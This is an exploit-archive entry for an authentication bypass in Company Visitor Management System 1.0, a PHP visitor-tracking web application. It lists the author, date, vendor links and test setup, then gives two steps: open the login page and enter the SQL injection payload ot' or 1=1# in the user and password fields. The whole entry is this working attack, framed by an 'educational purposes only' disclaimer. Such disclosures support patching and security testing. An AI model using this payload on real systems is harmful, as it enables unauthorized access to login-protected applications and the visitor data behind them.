Company visitor management system (cvms) 1.0 authentication bypass Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-10-16 |
Type : webapps |
Platform : php
This exploit / vulnerability Company visitor management system (cvms) 1.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Company Visitor Management System (CVMS) 1.0 - Authentication Bypass
# Date: 16/10/2020
# Exploit Author: Oğuz Türkgenç
# Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602
# Version: 1.0
# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3
Step 1: Open the URL http://localhost/cvms/index.php
Step 2: use payload ot' or 1=1# in user and password field